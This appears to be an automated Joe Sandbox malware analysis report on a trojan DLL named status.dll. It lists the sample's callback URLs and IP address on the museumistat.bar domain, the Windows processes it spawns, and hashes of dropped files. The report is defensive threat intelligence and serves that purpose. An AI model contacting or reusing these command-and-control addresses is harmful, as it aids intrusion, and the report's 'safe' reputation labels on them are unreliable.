                  http://museumistat.bar/drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlktrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://museumistat.bar/favicon.icotrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8regsvr32.exe, 00000004.00000003.346708342.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.353643418.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.346671708.0000000002F63000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://constitution.org/usdeclar.txtloaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzbregsvr32.exe, 00000004.00000003.333637218.0000000002F52000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.333810799.0000000002F62000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  31.41.44.3
                  		museumistat.barRussian Federation
                  		56577ASRELINKRUfalse

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:555803
                  Start date:19.01.2022
                  Start time:11:49:17
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 18m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:status.dll
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:55
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winDLL@80/93@8/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:
                  • Successful, ratio: 20.7% (good quality ratio 19.7%)
                  • Quality average: 80.9%
                  • Quality standard deviation: 28.1%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .dll
                  • Override analysis time to 240s for rundll32
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 23.203.70.208, 152.199.19.161
                  • Excluded domains from analysis (whitelisted): autosblogs.com, ie9comview.vo.msecnd.net, autosblogs.co, ctldl.windowsupdate.com, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, go.microsoft.com.edgekey.net, resolver1.opendns.com, watson.telemetry.microsoft.com, cs9.wpc.v0cdn.net
                  • Execution Graph export aborted for target mshta.exe, PID 2948 because there are no executed function
                  • Execution Graph export aborted for target mshta.exe, PID 6100 because there are no executed function
                  • Execution Graph export aborted for target mshta.exe, PID 620 because there are no executed function
                  • Execution Graph export aborted for target mshta.exe, PID 6304 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: status.dll

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  11:50:19API Interceptor2x Sleep call for process: loaddll32.exe modified
                  11:50:51API Interceptor224x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{09BDEB58-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):11264
                  Entropy (8bit):2.808654052006259
                  Encrypted:false
                  SSDEEP:96:BfGQXUkDwwpX8seKPVDpXk6Yv+8SYVyeKPVDpXk6Yv+8SwV+QfkDwwpX83SY+8S:NRV
                  MD5:81001C037EE82D956ADA214746439455
                  SHA1:2F957CAFB38C3ECBE736A7CB07E44EA9F6DF392B
                  SHA-256:E7D05C7E3DFDEC49FAC8FD8D346DA708B8201AAF5898C0392D638C63875E07B6
                  SHA-512:010493DF5A5CA425CE4E7005FB479BDAF8C7BAF3E376CD3C0BB5437AA6E2C347DA343D163B757746FED87991E4B43119DB1E09C45173FEB40E1FDCA7F2DD9E5C
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... nX.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.W.e.u.9.C.W.F.5.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB5A-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2883784054968714
                  Encrypted:false
                  SSDEEP:24:rsjGDGij9lRk6N1XY/Ak/Gcl1JNHyOu8Fq6oQlEB2:rsjGDGiFk6fXYDGcvTVFqXwEB
                  MD5:98762F84BA947A8B98D168C662845903
                  SHA1:09E493F6DF0885779D6CCAE16B41C7450A5E4B63
                  SHA-256:8C1A6CC5A54BB3CF5EE4E232A60C24E8FE8965B42BADD837BE5706000AAF6578
                  SHA-512:F79EF9CABDF76453FDEA837E79DDA9FAEBF2F8FE9D96DCF0BE8D7EAA15D61CDB91C96FF1A19FF35E88A4056C50CDC65BBFC5A57DF5809CDDEB6DAAAD40476797
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB5C-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3171449337294754
                  Encrypted:false
                  SSDEEP:24:rKG/2G+j9llHJ8+N1A9T2GKATRO0GlZlcYJsXmMUHGCr:rKGOG+JHJ3frl+X0HG
                  MD5:59045127F7CBD13C6640B02163D3886E
                  SHA1:590C9FB1957690BCD7F70ABB7AF91AB004A9BA6A
                  SHA-256:08462F2396EE2BF35C13A3786E3CB8C3B23A6BF68B1311D02EA9AF7EDD6F81FC
                  SHA-512:967DE6340AFB1D1B444BC93D67C4434B5CAD981B95C2FDCECD7CB15279456A679E1771DEFB4B59D2EC83D9DF54B1C1E19A64300ACC188AF879176CB4895D0B39
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... Ld.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................D.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB5E-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.289904298490222
                  Encrypted:false
                  SSDEEP:24:rSGOAGK9lxPkN1X7s5Fc6lyxez/OLemyKmb9+/F/nubpy:rSGOAG8PkfX7s7cu9myK49+/
                  MD5:FD5538DD35AE13E374C945DB0FE8FA59
                  SHA1:709E39CA6C932B7199CA13267B97C6B76A97E62D
                  SHA-256:5BBD8340E79D13E1DE86A5A380E6237BB4CF841AC0DD304624578652B0845244
                  SHA-512:B58F6D1F5DD918F495F7E2F2DF82A49554EE7C29DC584BA7198AA5A4CC89A0C1799DD05CE4F5299677D389F86AA2E2516AC2664C4FAF56C734239BAA1725DAFD
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p.v.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB60-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.295205175884244
                  Encrypted:false
                  SSDEEP:24:rZGO0Gi9lRniIN19lL+JK7wuKCG9y3U4r0EAKaBplyTX:rZGO0G0iIfz+W483Br00SL
                  MD5:3FD94D5CBD9C22B4A2F6D3217CE0690C
                  SHA1:07A25B3100E8C7381328E2320E2819E8C48C0F12
                  SHA-256:76F17C851CEED723F1B5BC62819CE87CCE659F72B5E6BFFAACC97D8D13786252
                  SHA-512:F5533C0741F64EF734B62C092F45B1C9C2BB547FFB941FF5C1490F5E1B6027A236C89A9A3AE50ED10BC3E1B9D37C9769A88B63E3216DC38D2F020F21B6857550
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................`.}.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB62-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.312258841574338
                  Encrypted:false
                  SSDEEP:24:riG2bGy9llqwN1DOaGIpmkG7apgpqN6S:riG2bGAqwfDONI/6pA
                  MD5:EB136AEC041CF4EA40F169AB749492F2
                  SHA1:C0CCD6D1FC26E1BA41B4A6EE9A63984401B302FF
                  SHA-256:24BD87EDA3EA9A94C8CF1E3EF4AD6366C588E84D559DF074A2075B52E900FBFC
                  SHA-512:88DF2E565142AD3F31398F739A093703F9A81CA1FED5E18D0163B486DF1BA5D03947E6560B2D92ACA29D3944B367A65CFEB0BE10CBD6C1228593004BA9075B17
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................0H..m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0416-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2950261946606005
                  Encrypted:false
                  SSDEEP:24:rzGiVGm9l8T2ON1LZhqJ7kO59UwZgFC4fX65:rzGiVGr2OfFhC7kO3ZgEK
                  MD5:90D53045C3B7CC78EC1DF90776FA18FA
                  SHA1:3F0CF28BC2C97327D06CE73DEAC4E09749E1695A
                  SHA-256:C2867DF53A37A91BB360F5A2651AB502230F1E8D9C32D537654E2246FF4FA2F8
                  SHA-512:465EB6C1340C1B8533769AFD282D7413F52061D0C5EA75BF172C8A35A2BD758CD8A812DA9BC2163E866F8EC4C910307311FC02DC86B6491BAC83519A30292176
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p...m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0418-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3023371410053706
                  Encrypted:false
                  SSDEEP:24:rrGXGi9lRSIN13McPRoiaPwgjVF6JOIFLony6Xe60h:rrGXG0SIf3MqoRPZoLqyz60
                  MD5:A0158AAE1DC44302468601BCCE705D61
                  SHA1:952A0063DED8FCB8D1C9D53246EF37F7BD5E2D3C
                  SHA-256:12FAD69507A192DBF10EEC8B96217A106D404F6CE0318DE033949655AFD93CD0
                  SHA-512:64DCFC114A262DAA38C9D089459245FFCC2A8133650FD5E20E3BC633DDF73DB19DA688979978D57008B2923F8982541E9BD778C5E0D502B38CD1BDD4CBE4F9A3
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED041A-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2994511521519128
                  Encrypted:false
                  SSDEEP:24:rYIGdGKj9lsEod2N1wcOq8Fg8deNlKjXb63MHbTV:rVGdGKZod2fbONBF
                  MD5:9A967D1F04EF15D2782E84B49ECB1EA1
                  SHA1:AF7F5B8E9D06580E087D58DF71EACA5E443FEBE2
                  SHA-256:4EC0452A500DD1F0A47ACB84A6E0ECE4E7F78EDBDA452ACDB0037B2B1699F37F
                  SHA-512:83952F71317BA61CC6970110AE041054A8A9E8D0463546081A5F3056223199EB8FA3F7C5B01FAE2A7DF19E164CF418FF686F9C4AE7FBFA3C104815E35C6849A4
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................8.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED041C-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.306547404475649
                  Encrypted:false
                  SSDEEP:24:rkGhlIGi9lRZIN1zIlDkqGGqh7SFEwEr+84:rkGzIG0ZIfzYDoDh7SSBr
                  MD5:325D2017DAA31B81286F66BFF06DB3C5
                  SHA1:5BB0131E451378A99B2382C20A29589B194EAFB9
                  SHA-256:5AEAA8D1E67B328141F648BEF6955532F160AC9FC264591FD2D1A0302F0F6A9C
                  SHA-512:F88702E476A16E75DC096668E5332C343CB1383DAF2DC5138599FF8AE18AABCC01F079B0B2342AAF9912250D10C49A16BCA7D41601910A3B102A42529EA77AF8
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p..m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED041E-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2981524474519928
                  Encrypted:false
                  SSDEEP:24:r9jGiQIGm9l8Tfb2NON1Z8NtzjbJBVleaTMg3PYW5KygBW:r9jGiQIGrmOfZcLlBMg3tKyg
                  MD5:A180972D696EE08A02107CE93E7D82AF
                  SHA1:C36D287CC67C833F72B5345B85EDCC3F7647682A
                  SHA-256:900C6DD8CD99C3E4932F14D69111277901D07FE368ED7F6306060D1283B3BB96
                  SHA-512:7B074092D409A29DB2B62016A8A7E482238A9E32E30D6E6821A6153691DFD9BBE2DFDBD9BACCBB72D2B28D039ACB857468E875FD50DD865BEBE9B0DF781BF8EE
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................@.!.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0420-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.295278688132882
                  Encrypted:false
                  SSDEEP:24:rVGkGij9lRg6N1A+IU8kayvvqydgCm61Vo4:rVGkGiFg6fTIUogvBdDN1Vo
                  MD5:885FC86A763E7D7F46944BA56953917C
                  SHA1:E411EE227F0AC830F76256720EBA2320A85F0A14
                  SHA-256:7275D8709350C8BD3F4BAD12EFD7BB6328937857AA7E366C3806BF637B90BD74
                  SHA-512:92091DAAFF31C921BFD4B134DBD4861F44A5232F7BEFB1AFCCF36FF64B5F5BD6F9A4590E5742E2CBDE6C48A61F342330BA62CB1B68A292AA9D261215A412A10E
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.......................................................................................... H.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0422-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.311509983566947
                  Encrypted:false
                  SSDEEP:12:rlxAFZJrEgmfep7fFaFrEgmfY7qFI9lIqat0vwN1YWSUltKbrD4DevGl/7xJiw/Z:rAG2aGy9llvwN1ZfKi7xxZQQ20
                  MD5:6E81154BFA009D8E5BE36EBF76AD0483
                  SHA1:21E3570E678E33DE69993E602A7A70D9B490172E
                  SHA-256:C04A92C36C873F128A98DABA8FBB9843E5DB0F933D0223E95734F71DA04B1315
                  SHA-512:C4919341CCA7660DDBF17AA4BC487EF504E4E7ACEC595D66F2B160B0CB69D1BDA5DC87B466A92120BE7D908C7617EAF4C80F36AD17E561E288DE289354708D34
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\61e7ecf72c368[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):315596
                  Entropy (8bit):5.9999382485815005
                  Encrypted:false
                  SSDEEP:6144:ovasBgj02Aq4mu85onKq7NDl3ypsoVYEJZ1VmrhI/1xO6JXeokUr4VGISRRQ:LsBg9Aj17tl309LJZ1VmuLlZzLRRQ
                  MD5:BBBD8E91C179E72AA7B70F9916CB0936
                  SHA1:B200CB57C1AC573FF2895A4EBBD2D38C0A11CFC3
                  SHA-256:94527A5DD418CC8C12477427079E1AC1F89190DD4B0D7A4BE394668B0842608F
                  SHA-512:D3DF50CA9183081E0534A37B7993AEF4524A18F0EF9CD80B692ECC9A9BDBA4AB3274335F1CAE4471CB239015C4EA2D48D228C8A20F8D05D6FF877888FBEFF122
                  Malicious:false
                  Reputation:unknown
